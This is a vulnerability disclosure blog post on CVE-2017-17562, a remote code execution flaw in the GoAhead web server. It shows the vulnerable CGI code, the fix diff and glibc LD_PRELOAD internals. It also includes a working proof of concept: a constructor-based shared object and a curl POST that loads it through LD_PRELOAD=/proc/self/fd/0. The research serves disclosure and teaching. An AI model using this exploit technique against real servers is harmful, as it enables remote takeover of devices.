Remote LD_PRELOAD Exploitation
GoAhead: Make My Day
GoAhead: Make My Day
This blog post details CVE-2017-17562, a vulnerability which can be exploited to gain reliable remote code execution in all versions of the GoAhead web server < 3.6.5.
The vulnerability is a result of Initialising the environment of forked CGI scripts using untrusted HTTP request parameters, and will affect all user’s who have CGI support enabled with dynamically linked executables (CGI scripts). This behavior, when combined with the glibc dynamic linker, can be abused for remote code execution using special variables such as LD_PRELOAD
(commonly used to perform function hooking, see preeny).
For those unfamiliar with GoAhead, its marketing page says that it’s “the world’s most popular, tiny embedded web server” and is used by such companies as IBM, HP, Oracle, Boeing, D-link, and Motorola. We did a search on shodan [1], and found over 735,000 devices using it on the internet today.
[1] Update 28/12: It’s important to note that this number only reflects which set of servers responded to Shodan requests with a “Server: GoAhead” header. This does not reflect the actual subset of devices affected by this issue - which is limited to servers running *nix, have CGI enabled, and are compiled using dynamically linked executables.
The exploitation of this issue serves as an interesting case study, and could be applied to other types of software with the same insecure construct.
This vulnerability has existed in all versions of the GoAhead source since at least 2.5.0 (we could not find earlier versions to test against) with the optional CGI support enabled. You can follow along by cloning and compiling the repository as follows:
The vulnerability resides in the cgiHandler
function, which starts by allocating an array of pointers for the envp
argument of the new process, followed by initialising it with the key-value pairs taken from HTTP request parameters. Finally, the launchCgi
function is called which fork
’s and execve
’s the CGI script.
Besides filtering REMOTE_HOST
and HTTP_AUTHORIZATION
, all other parameters are considered trusted and passed along unfiltered. This allows an attacker control over arbitrary environment variables for the new CGI process. This is quite dangerous, as you will see later in the exploitation section.
...
PUBLIC bool cgiHandler(Webs *wp)
{
Cgi *cgip;
WebsKey *s;
char cgiPrefix[ME_GOAHEAD_LIMIT_FILENAME], *stdIn, *stdOut, cwd[ME_GOAHEAD_LIMIT_FILENAME];
char *cp, *cgiName, *cgiPath, **argp, **envp, **ep, *tok, *query, *dir, *extraPath, *exe;
CgiPid pHandle;
int n, envpsize, argpsize, cid;
...
/*
Add all CGI variables to the environment strings to be passed to the spawned CGI process. This includes a few
we don't already have in the symbol table, plus all those that are in the vars symbol table. envp will point
to a walloc'd array of pointers. Each pointer will point to a walloc'd string containing the keyword value pair
in the form keyword=value. Since we don't know ahead of time how many environment strings there will be the for
loop includes logic to grow the array size via wrealloc.
*/
envpsize = 64;
envp = walloc(envpsize * sizeof(char*));
for (n = 0, s = hashFirst(wp->vars); s != NULL; s = hashNext(wp->vars, s)) {
if (s->content.valid && s->content.type == string &&
strcmp(s->name.value.string, "REMOTE_HOST") != 0 &&
strcmp(s->name.value.string, "HTTP_AUTHORIZATION") != 0) {
envp[n++] = sfmt("%s=%s", s->name.value.string, s->content.value.string);
trace(5, "Env[%d] %s", n, envp[n-1]);
if (n >= envpsize) {
envpsize *= 2;
envp = wrealloc(envp, envpsize * sizeof(char *));
}
}
}
*(envp+n) = NULL;
/*
Create temporary file name(s) for the child's stdin and stdout. For POST data the stdin temp file (and name)
should already exist.
*/
if (wp->cgiStdin == NULL) {
wp->cgiStdin = websGetCgiCommName();
}
stdIn = wp->cgiStdin;
stdOut = websGetCgiCommName();
if (wp->cgifd >= 0) {
close(wp->cgifd);
wp->cgifd = -1;
}
/*
Now launch the process. If not successful, do the cleanup of resources. If successful, the cleanup will be
done after the process completes.
*/
if ((pHandle = launchCgi(cgiPath, argp, envp, stdIn, stdOut)) == (CgiPid) -1) {
...
This issue was fixed by skipping special parameter names, and prefixing all others with a static string. This appears to remediate the issue even against parameters of the form a=b%00LD_PRELOAD%3D
- but please let me know if you find otherwise, I’d love to hear about it!
diff --git a/src/cgi.c b/src/cgi.c
index 899ec97b..18d9b45b 100644
--- a/src/cgi.c
+++ b/src/cgi.c
@@ -160,10 +160,17 @@ PUBLIC bool cgiHandler(Webs *wp)
envpsize = 64;
envp = walloc(envpsize * sizeof(char*));
for (n = 0, s = hashFirst(wp->vars); s != NULL; s = hashNext(wp->vars, s)) {
- if (s->content.valid && s->content.type == string &&
- strcmp(s->name.value.string, "REMOTE_HOST") != 0 &&
- strcmp(s->name.value.string, "HTTP_AUTHORIZATION") != 0) {
- envp[n++] = sfmt("%s=%s", s->name.value.string, s->content.value.string);
+ if (s->content.valid && s->content.type == string) {
+ if (smatch(s->name.value.string, "REMOTE_HOST") ||
+ smatch(s->name.value.string, "HTTP_AUTHORIZATION") ||
+ smatch(s->name.value.string, "IFS") ||
+ smatch(s->name.value.string, "CDPATH") ||
+ smatch(s->name.value.string, "PATH") ||
+ sstarts(s->name.value.string, "LD_")) {
+ continue;
+ }
+ envp[n++] = sfmt("%s%s=%s", ME_GOAHEAD_CGI_PREFIX,
+ s->name.value.string, s->content.value.string);
trace(5, "Env[%d] %s", n, envp[n-1]);
if (n >= envpsize) {
envpsize *= 2;
Although the ability to inject arbitrary environment variables into a new process may seem relatively benign, there are cases where “special” environment variables can lead to alternative control flows for the dynamic linker.
Reading the ELF header of the goahead
binary, we can see that it’s a 64-bit dynamically-linked executable. The program interpreter is specified in the INTERP
section and points to /lib64/ld-linux-x86-64.so.2
(this is the dynamic linker).
daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -hl ./goahead
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: DYN (Shared object file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0xf80
Start of program headers: 64 (bytes into file)
Start of section headers: 21904 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
Number of program headers: 9
Size of section headers: 64 (bytes)
Number of section headers: 34
Section header string table index: 33
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040
0x00000000000001f8 0x00000000000001f8 R E 0x8
INTERP 0x0000000000000238 0x0000000000000238 0x0000000000000238
0x000000000000001c 0x000000000000001c R 0x1
[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
...
daniel@makemyday:~/goahead/build/linux-x64-default/bin$
The dynamic linker is the first code which runs in a dynamically linked executable, and is responsible for linking and loading shared objects and resolving symbols. To get a list of all the shared objects the goahead
binary loads, we can set a special environment variable LD_TRACE_LOADED_OBJECTS
to 1
, which prints the loaded libraries and then exits.
daniel@makemyday:~/goahead/build/linux-x64-default/bin$ LD_TRACE_LOADED_OBJECTS=1 ./goahead
linux-vdso.so.1 => (0x00007fff31bb4000)
libgo.so => /home/daniel/goahead/build/linux-x64-default/bin/libgo.so (0x00007f571f548000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f571f168000)
libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f571ef49000)
/lib64/ld-linux-x86-64.so.2 (0x00007f571f806000)
daniel@makemyday:~/goahead/build/linux-x64-default/bin$
We can also find this information statically (without running the dynamic linker), by grepping for DT_NEEDED
entries defined in each of the ELF shared objects recursively:
daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d ./goahead | grep NEEDED
0x0000000000000001 (NEEDED) Shared library: [libgo.so]
0x0000000000000001 (NEEDED) Shared library: [libc.so.6]
daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d /home/daniel/goahead/build/linux-x64-default/bin/libgo.so | grep NEEDED
0x0000000000000001 (NEEDED) Shared library: [libpthread.so.0]
0x0000000000000001 (NEEDED) Shared library: [libc.so.6]
daniel@makemyday:~/goahead/build/linux-x64-default/bin$ readelf -d /lib/x86_64-linux-gnu/libc.so.6 | grep NEEDED
0x0000000000000001 (NEEDED) Shared library: [ld-linux-x86-64.so.2]
daniel@makemyday:~/goahead/build/linux-x64-default/bin$
Note: For the astute reader who noticed these binaries are missing linux-vdso.so.1
, that’s correct! vDSO is a special shared library mapped into user-space processes by the kernel. See man 7 vdso.
So that’s good and all, but what does any of this have to do with injecting environment variables? Well … we know the dynamic linker is the first code to execute for a new process - and if we read man 8 ld.so we discover there are special environment variables which modify default behavior.
As I’m a fan of looking at the source, let us take a journey into what’s happening. The dl_main
function is essentially the main entry point of the dynamic linker.
static void
dl_main (const ElfW(Phdr) *phdr,
ElfW(Word) phnum,
ElfW(Addr) *user_entry,
ElfW(auxv_t) *auxv)
{
const ElfW(Phdr) *ph;
enum mode mode;
struct link_map *main_map;
size_t file_size;
char *file;
bool has_interp = false;
unsigned int i;
...
/* Process the environment variable which control the behaviour. */
process_envvars (&mode);
One of the first things this function does is call process_envvars
.
static void
process_envvars (enum mode *modep)
{
char **runp = _environ;
char *envline;
enum mode mode = normal;
char *debug_output = NULL;
/* This is the default place for profiling data file. */
GLRO(dl_profile_output)
= &"/var/tmp\0/var/profile"[__libc_enable_secure ? 9 : 0];
while ((envline = _dl_next_ld_env_entry (&runp)) != NULL)
{
size_t len = 0;
while (envline[len] != '\0' && envline[len] != '=')
++len;
if (envline[len] != '=')
/* This is a "LD_" variable at the end of the string without
a '=' character. Ignore it since otherwise we will access
invalid memory below. */
continue;
switch (len)
{
case 4:
/* Warning level, verbose or not. */
if (memcmp (envline, "WARN", 4) == 0)
GLRO(dl_verbose) = envline[5] != '\0';
break;
case 5:
/* Debugging of the dynamic linker? */
if (memcmp (envline, "DEBUG", 5) == 0)
{
process_dl_debug (&envline[6]);
break;
}
if (memcmp (envline, "AUDIT", 5) == 0)
audit_list_string = &envline[6];
break;
case 7:
/* Print information about versions. */
if (memcmp (envline, "VERBOSE", 7) == 0)
{
version_info = envline[8] != '\0';
break;
}
/* List of objects to be preloaded. */
if (memcmp (envline, "PRELOAD", 7) == 0)
{
preloadlist = &envline[8];
break;
}
We see that the linker is parsing the envp
array and exercising different code paths if special variable names are found. What is particularly interesting is case 7
’s processing of LD_PRELOAD
, where preloadlist
is initialised.
...
/* We have two ways to specify objects to preload: via environment
variable and via the file /etc/ld.so.preload. The latter can also
be used when security is enabled. */
assert (*first_preload == NULL);
struct link_map **preloads = NULL;
unsigned int npreloads = 0;
if (__glibc_unlikely (preloadlist != NULL))
{
HP_TIMING_NOW (start);
npreloads += handle_ld_preload (preloadlist, main_map);
HP_TIMING_NOW (stop);
HP_TIMING_DIFF (diff, start, stop);
HP_TIMING_ACCUM_NT (load_time, diff);
}
...
Further down in dl_main
, if preloadlist
is not NULL
then the handle_ld_preload
function is called.
/* The list preloaded objects. */
static const char *preloadlist attribute_relro;
/* Nonzero if information about versions has to be printed. */
static int version_info attribute_relro;
/* The LD_PRELOAD environment variable gives list of libraries
separated by white space or colons that are loaded before the
executable's dependencies and prepended to the global scope list.
(If the binary is running setuid all elements containing a '/' are
ignored since it is insecure.) Return the number of preloads
performed. */
unsigned int
handle_ld_preload (const char *preloadlist, struct link_map *main_map)
{
unsigned int npreloads = 0;
const char *p = preloadlist;
char fname[SECURE_PATH_LIMIT];
while (*p != '\0')
{
/* Split preload list at space/colon. */
size_t len = strcspn (p, " :");
if (len > 0 && len < sizeof (fname))
{
memcpy (fname, p, len);
fname[len] = '\0';
}
else
fname[0] = '\0';
/* Skip over the substring and the following delimiter. */
p += len;
if (*p != '\0')
++p;
if (dso_name_valid_for_suid (fname))
npreloads += do_preload (fname, main_map, "LD_PRELOAD");
}
return npreloads;
}
...
The handle_ld_preload
function will parse the preloadlist
and treat its value as a list of shared objects to be loaded!
If we put all this together; with goahead
enabling us to inject arbitrary environment variables, we can abuse the fact that glibc handles special cases such as LD_PRELOAD
differently to load arbitrary shared objects that aren’t even listed in the binary!
So, that’s cool and all - we can force arbitrary shared objects to be loaded. But how does this allow us to run code?
Enter the .init
and .fini
sections. If we wrap a function with a constructor attribute then we can force that function to be called even before main
.
#include <unistd.h>
static void before_main(void) __attribute__((constructor));
static void before_main(void)
{
write(1, "Hello: World!\n", 14);
}
daniel@makemyday:~/goahead/PoC$ gcc -shared -fPIC ./payload.c -o payload.so
daniel@makemyday:~/goahead/PoC$ LD_PRELOAD=./payload.so cat /dev/null
Hello: World!
daniel@makemyday:~/goahead/PoC$
Sweet! What does this look like if we try this out against GoAhead on our test system?
daniel@makemyday:~/goahead/PoC$ ls -la ./payload.so
-rwxrwxr-x 1 daniel daniel 7896 Dec 13 17:38 ./payload.so
daniel@makemyday:~/goahead/PoC$ echo -en "GET /cgi-bin/cgitest?LD_PRELOAD=$(pwd)/payload.so HTTP/1.0\r\n\r\n" | nc localhost 80 | head -10
HTTP/1.0 200 OK
Date: Wed Dec 13 02:38:56 2017
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: no-cache
hello: World!
content-type: text/html
daniel@makemyday:~/goahead/PoC$
We can clearly see that our shared objects code was executed by the cgitest
process via LD_PRELOAD
.
There is still one critical piece of the puzzle that we are missing. Even though we know it’s possible to load arbitrary shared objects from disk, and constructors will allow for code execution - how do we actually inject a malicious shared object into the remote server? After all, if we can’t do that then it’s really unlikely a legitimate shared object on disk will help us.
Fortunately, the launchCgi
method will actually dup2() the stdin file descriptor which points to a temporary file containing the request body of the POST
request. This means that there will be a file on disk containing user-supplied data and could be referenced with something like LD_PRELOAD=/tmp/cgi-XXXXXX
.
/*
Launch the CGI process and return a handle to it.
*/
static CgiPid launchCgi(char *cgiPath, char **argp, char **envp, char *stdIn, char *stdOut)
{
int fdin, fdout, pid;
trace(5, "cgi: run %s", cgiPath);
if ((fdin = open(stdIn, O_RDWR | O_CREAT | O_BINARY, 0666)) < 0) {
error("Cannot open CGI stdin: ", cgiPath);
return -1;
}
if ((fdout = open(stdOut, O_RDWR | O_CREAT | O_TRUNC | O_BINARY, 0666)) < 0) {
error("Cannot open CGI stdout: ", cgiPath);
return -1;
}
pid = vfork();
if (pid == 0) {
/*
Child
*/
if (dup2(fdin, 0) < 0) {
printf("content-type: text/html\n\nDup of stdin failed\n");
_exit(1);
} else if (dup2(fdout, 1) < 0) {
printf("content-type: text/html\n\nDup of stdout failed\n");
_exit(1);
} else if (execve(cgiPath, argp, envp) == -1) {
printf("content-type: text/html\n\nExecution of cgi process failed\n");
}
...
}
Still, this is kind of annoying (but not impossible) having to remotely guess the temporary filename containing our POST
payload. Fortunately, the Linux procfs
filesystem has a nice symbolic link that we can use to reference the stdin descriptor, which points to our temporary file. This can leveraged by pointing LD_PRELOAD
to /proc/self/fd/0
. This can also be accessed using /dev/stdin
.
static const char *proc_self_get_link(struct dentry *dentry,
struct inode *inode,
struct delayed_call *done)
{
struct pid_namespace *ns = inode->i_sb->s_fs_info;
pid_t tgid = task_tgid_nr_ns(current, ns);
char *name;
if (!tgid)
return ERR_PTR(-ENOENT);
/* 11 for max length of signed int in decimal + NULL term */
name = kmalloc(12, dentry ? GFP_KERNEL : GFP_ATOMIC);
if (unlikely(!name))
return dentry ? ERR_PTR(-ENOMEM) : ERR_PTR(-ECHILD);
sprintf(name, "%d", tgid);
set_delayed_call(done, kfree_link, name);
return name;
}
static const struct inode_operations proc_self_inode_operations = {
.get_link = proc_self_get_link,
};
If we put all this information together, we can reliably exploit the vulnerability by sending a POST
request containing a malcious shared object which contains a constructor
to be called when loaded. We also specify an HTTP parameter containing ?LD_PRELOAD=/proc/self/fd/0
which will point to the temporary file on disk containing the attackers payload. At this point it’s game over.
daniel@makemyday:~/goahead/PoC$ curl -X POST --data-binary @payload.so http://makemyday/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i | head
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 9931 0 2035 100 7896 2035 7896 0:00:01 0:00:01 --:--:-- 9774
HTTP/1.1 200 OK
Date: Sun Dec 17 13:08:20 2017
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: no-cache
hello: World!
Content-type: text/html
daniel@makemyday:~/goahead/PoC$
If you would like a ready-to-go exploit please check out our advisory repo on GitHub.
This vulnerability was an interesting case study in how to remotely exploit LD_PRELOAD
, and was tested (and worked) against all versions of the GoAhead web server that we compiled with CGI support enabled. The construct itself may exist in other services, and it would be interesting to investigate. It may be possible to just use the exploit string and do this blind without actually auditing any code.
Although the CGI handling code remained relatively stable in all versions of the web server (which made it the ideal target), there has been a significant amount of code churn over the years in other modules. It’s possible there are other interesting vulnerabilities - and for those interested I’d recommend starting with a grep for websDefineHandler
entry points.
If you’re interested in learning more about linking and loading, there’s a great article here and here that we suggest you check out.
Thanks for reading!
Remote LD_PRELOAD Exploitation
October 2024 - A Monocle on Chronicles
August 2024 - DUCTF 2024 ESPecially Secure Boot Writeup
July 2024 - plORMbing your Prisma ORM with Time-based Attacks
June 2024 - plORMbing your Django ORM
January 2024 - Keeping up with the Pwnses
October 2023 - Exploring the STSAFE-A110
elttam is a globally recognised, independent information security company, renowned for our advanced technical security assessments.
Read more about our services at elttam.com
Connect with us on LinkedIn
Follow us at @elttam